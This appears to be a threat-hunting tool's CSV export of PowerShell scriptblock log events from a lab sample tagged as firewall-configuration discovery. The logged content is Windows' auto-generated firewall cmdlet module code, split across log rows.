Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_def,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"aultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { 